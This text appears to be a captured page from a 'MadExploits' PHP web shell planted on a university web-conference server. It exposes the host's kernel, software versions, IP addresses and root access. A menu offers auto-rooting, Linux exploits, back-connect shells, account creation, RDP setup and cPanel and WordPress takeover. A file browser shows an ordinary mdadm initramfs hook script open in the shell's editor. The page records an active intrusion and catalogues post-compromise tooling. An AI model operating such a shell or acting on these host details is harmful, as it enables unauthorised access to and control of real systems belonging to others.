Linux web-conference.aiou.edu.pk 5.4.0-205-generic #225-Ubuntu SMP Fri Jan 10 22:23:35 UTC 2025 x86_64
Apache/2.4.41 (Ubuntu)
: 172.16.50.247 | : 3.17.177.248
Cant Read [ /etc/named.conf ]
7.4.3-4ubuntu2.28
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
share /
initramfs-tools /
hooks /
[ HOME SHELL ]
Name
Size
Permission
Action
amd64_microcode
3.77
KB
-rwxr-xr-x
bcache
543
B
-rwxr-xr-x
btrfs
568
B
-rwxr-xr-x
cloud-initramfs-dyn-netconf
118
B
-rwxr-xr-x
compcache
3.55
KB
-rwxr-xr-x
console_setup
3.07
KB
-rwxr-xr-x
copymods
280
B
-rwxr-xr-x
cryptgnupg
921
B
-rwxr-xr-x
cryptgnupg-sc
2.19
KB
-rwxr-xr-x
cryptkeyctl
424
B
-rwxr-xr-x
cryptopensc
1.64
KB
-rwxr-xr-x
cryptpassdev
888
B
-rwxr-xr-x
cryptroot
16.84
KB
-rwxr-xr-x
cryptroot-unlock
637
B
-rwxr-xr-x
dmsetup
506
B
-rwxr-xr-x
fixrtc
436
B
-rwxr-xr-x
framebuffer
579
B
-rwxr-xr-x
fsck
1.91
KB
-rwxr-xr-x
fuse
230
B
-rwxr-xr-x
intel_microcode
4.83
KB
-rwxr-xr-x
iscsi
732
B
-rwxr-xr-x
kbd
301
B
-rwxr-xr-x
klibc-utils
646
B
-rwxr-xr-x
kmod
432
B
-rwxr-xr-x
lvm2
670
B
-rwxr-xr-x
mdadm
2.83
KB
-rwxr-xr-x
ntfs_3g
304
B
-rwxr-xr-x
overlayroot
732
B
-rwxr-xr-x
plymouth
5.74
KB
-rwxr-xr-x
resume
3.04
KB
-rwxr-xr-x
sg3-utils
485
B
-rwxr-xr-x
thermal
1.29
KB
-rwxr-xr-x
thin-provisioning-tools
369
B
-rwxr-xr-x
udev
1.66
KB
-rwxr-xr-x
xfs
850
B
-rwxr-xr-x
zz-busybox-initramfs
2.18
KB
-rwxr-xr-x
zz-dhclient
478
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : mdadm
#!/bin/sh # # Copyright © 2006-2008 Martin F. Krafft <madduck@debian.org>, # 2012 Michael Tokarev <mjt@tls.msk.ru> # based on the scripts in the initramfs-tools package. # released under the terms of the Artistic Licence. # set -eu PREREQ="udev" prereqs() { echo "$PREREQ" } case "${1:-}" in prereqs) prereqs exit 0 ;; esac is_true() { case "${1:-}" in [Yy]es|[Yy]|1|[Tt]rue|[Tt]) return 0;; *) return 1;; esac } write() { local PREFIX; PREFIX=$1; shift echo "${PREFIX}: mdadm: $@" >&2 } info() { is_true ${VERBOSE:-false} && write I "$@" || : } warn() { write W "$@" } . /usr/share/initramfs-tools/hook-functions # copy the binary as early as possible copy_exec /sbin/mdadm /sbin copy_exec /sbin/mdmon /sbin # Copy udev rules, which udev no longer does for UDEV_RULE in 63-md-raid-arrays.rules 64-md-raid-assembly.rules; do for rules_folder in /lib/udev/rules.d /etc/udev/rules.d; do if [ -f $rules_folder/$UDEV_RULE ]; then mkdir -p $DESTDIR$rules_folder cp $rules_folder/$UDEV_RULE $DESTDIR$rules_folder/$UDEV_RULE fi done done # load raid modules in the initramfs for module in linear multipath raid0 raid1 raid456 raid5 raid6 raid10; do force_load $module done # copy the mdadm configuration CONFIG=/etc/mdadm/mdadm.conf ALTCONFIG=/etc/mdadm.conf DESTMDADMCONF=$DESTDIR/etc/mdadm/mdadm.conf [ ! -f $CONFIG ] && [ -f $ALTCONFIG ] && CONFIG=$ALTCONFIG || : mkdir -p ${DESTDIR}/etc/mdadm if [ ! -f $CONFIG ]; then # there is no configuration file, so let's create one if /usr/share/mdadm/mkconf generate $CONFIG; then # all is well cp -p $CONFIG $DESTMDADMCONF info "auto-generated the mdadm.conf configuration file." else # we failed to auto-generate, so let the emergency procedure take over warn "failed to auto-generate the mdadm.conf file." warn "please read /usr/share/doc/mdadm/README.upgrading-2.5.3.gz ." fi else cp -p $CONFIG ${DESTDIR}/etc/mdadm sed -i '/^CREATE/s/^/#/' $DESTMDADMCONF if ! grep -q '^ARRAY' $CONFIG; then tmpfile="${DESTMDADMCONF}.tmp" if /usr/share/mdadm/mkconf > $tmpfile; then cp -p $tmpfile $DESTMDADMCONF else warn "failed to auto-generate temporary mdadm.conf file." fi else # make sure the configuration file knows about all running devices /sbin/mdadm --detail --scan | while read array device params; do uuid=${params#*UUID=}; uuid=${uuid%% *} if grep -qi "UUID=$uuid" $DESTMDADMCONF; then info "$uuid $device added to the mdadm.conf in the initramfs" fi done fi fi
Close